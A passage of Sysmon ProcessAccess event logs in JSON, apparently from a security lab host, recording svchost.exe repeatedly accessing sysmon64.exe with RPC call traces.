T4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5105,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5106,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5107,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5108,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5109,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5110,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5111,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5112,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+